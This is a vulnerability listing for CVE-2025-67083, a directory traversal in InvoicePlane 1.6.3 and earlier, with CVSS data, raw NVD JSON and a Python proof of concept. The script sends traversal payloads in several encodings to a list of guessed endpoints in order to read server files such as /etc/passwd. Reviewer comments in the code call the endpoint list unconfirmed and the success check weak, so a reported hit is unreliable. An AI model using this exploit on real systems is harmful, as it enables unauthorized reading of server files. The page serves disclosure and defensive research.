Security Vulnerability Report
CVE-2025-67083 CVSS 5.3 MEDIUM

CVE-2025-67083

Published: 2026-01-15 15:15:51
Last Modified: 2026-01-22 16:03:54

Description

Directory traversal vulnerability in InvoicePlane through 1.6.3 allows unauthenticated attackers to read files from the server. The ability to read files and the file type depends on the web server and its configuration.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:invoiceplane:invoiceplane:*:*:*:*:*:*:*:* - VULNERABLE
InvoicePlane through 1.6.3 (CPE match: versionEndExcluding 1.6.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67083 Directory Traversal PoC for InvoicePlane
# Target: InvoicePlane <= 1.6.3 (the CPE match on this page uses versionEndExcluding 1.6.4)
# Vulnerability: Unauthenticated file read via path traversal (CWE-22 in the advisory data)
#
# Reviewer notes on this listing as published (the code below is unchanged):
#  - Every request is sent with verify=False, so TLS certificate validation is
#    disabled for the whole run.
#  - The "does the body look like a file" check is a substring match on very
#    generic tokens ('[', '{"', '<!'); an ordinary HTML or JSON 200 response is
#    likely to satisfy it, so a "[+] VULNERABLE" line is a lead to confirm by
#    hand, not proof of a file read.
#  - For detection and mitigation the useful part is the set of traversal
#    encodings in traversal_patterns (plain, backslash, percent-encoded,
#    double-encoded, '....//'): a server-side path check has to canonicalise
#    before comparing against the allowed directory, and the same strings are
#    what to search for in web-server access logs.
import requests
import sys


def test_directory_traversal(target_url: str, file_path: str):
    """Probe a fixed list of InvoicePlane URL paths for a traversal-based file read.

    For each entry in ``endpoints`` and each encoding in ``traversal_patterns`` one
    GET is sent to ``target_url.rstrip('/') + endpoint + pattern``; ``file_path`` is
    appended verbatim (no URL encoding is applied). The first response with status
    200 whose body contains any of the indicator substrings is printed (first 500
    characters) and returned; everything else is ignored.

    Args:
        target_url: Base URL of the InvoicePlane installation (trailing slash is stripped).
        file_path: Path to request, e.g. ``../../../../etc/passwd`` (used as given).

    Returns:
        The full response body (``response.text``) of the first match, or ``None``
        when no endpoint/pattern combination produced a matching 200 response.

    Notes:
        - ``verify=False`` disables certificate verification on every request.
        - A ``requests`` error on one endpoint is printed and the remaining
          patterns for that endpoint are skipped; the next endpoint is still tried.
        - The indicator list contains ``'['``, ``'{"'`` and ``'<!'``, so the match
          is weak and false positives are likely (see module header).
    """
    # Common vulnerable endpoints in InvoicePlane
    # NOTE(review): this looks like a candidate list rather than the confirmed
    # affected route; nothing on this page says which of these paths (if any)
    # is the one the advisory describes — confirm against the linked advisory
    # before treating a negative result as "not vulnerable".
    endpoints = [
        '/download?file=',
        '/uploads/',
        '/get_file?filename=',
        '/assets/',
        '/files/',
        '/downloads/',
        '/inv_file/download?file=',
        '/uploads_files/',
        '/get_attachment?file=',
        '/download_invoice?file=',
        '/get_pdf?file=',
        '/download_pdf?id='
    ]
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': '*/*'
    }
    for endpoint in endpoints:
        try:
            # Try different traversal patterns
            # The backslash variant contains '\.' and '\{' sequences, which are
            # invalid escapes (a warning on recent interpreters); the exact text
            # it produces may differ between Python versions — confirm if the
            # Windows-style pattern matters.
            traversal_patterns = [
                file_path,
                f'../../../../{file_path}',
                f'..\..\..\..\{file_path}',
                f'%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{file_path}',
                f'....//....//....//....//{file_path}',
                f'..%252f..%252f..%252f..%252f{file_path}'
            ]
            for pattern in traversal_patterns:
                url = target_url.rstrip('/') + endpoint + pattern
                # verify=False: certificate errors are not treated as failures.
                response = requests.get(url, headers=headers, timeout=10, verify=False)
                if response.status_code == 200:
                    # Check if response contains file content
                    # Weak heuristic: '[' / '{"' / '<!' will also match most
                    # HTML or JSON bodies, so this reports on the first 200
                    # that merely looks structured.
                    if any(indicator in response.text for indicator in ['root:', '<?php', '<?xml', '{"', '[', '<!']):
                        print(f"[+] VULNERABLE: {url}")
                        print(f"[+] File content preview:")
                        print(response.text[:500])
                        return response.text
        except requests.exceptions.RequestException as e:
            # Error on this endpoint is reported; the loop continues with the
            # next endpoint (remaining patterns for this one are not retried).
            print(f"[-] Error testing {endpoint}: {e}")
    return None


def main():
    """CLI entry point: reads ``<target_url> <file_path>`` from argv and runs the probe.

    Exits with status 1 (after printing usage) when fewer than two arguments are
    given. Prints a success line when ``test_directory_traversal`` returned a body,
    otherwise a "may not be vulnerable" line; the result is not written anywhere.
    """
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-67083.py <target_url> <file_path>")
        print("Example: python cve-2025-67083.py http://target.com ../../../../etc/passwd")
        sys.exit(1)
    target_url = sys.argv[1]
    file_path = sys.argv[2]
    print(f"[*] Testing CVE-2025-67083 on {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    result = test_directory_traversal(target_url, file_path)
    # Truthiness of the body decides the verdict: an empty 200 body that matched
    # nothing, or no match at all, both end up in the "not vulnerable" branch.
    if result:
        print("\n[+] Exploitation successful!")
    else:
        print("\n[-] Target may not be vulnerable or file not accessible")


if __name__ == "__main__":
    main()

References (listed in the `references` array of the raw JSON below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67083", "sourceIdentifier": "[email protected]", "published": "2026-01-15T15:15:51.313", "lastModified": "2026-01-22T16:03:54.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directory traversal vulnerability in InvoicePlane through 1.6.3 allows unauthenticated attackers to read files from the server. The ability to read files and the file type depends on the web server and its configuration."}, {"lang": "es", "value": "Vulnerabilidad de salto de directorio en InvoicePlane hasta 1.6.3 permite a atacantes no autenticados leer archivos del servidor. La capacidad de leer archivos y el tipo de archivo depende del servidor web y su configuración."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceplane:invoiceplane:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.4", "matchCriteriaId": "17C261C3-0A6B-4D07-8370-DD3C71097DE2"}]}]}], "references": [{"url": "https://github.com/InvoicePlane/InvoicePlane", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.helx.io/blog/advisory-invoice-plane/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}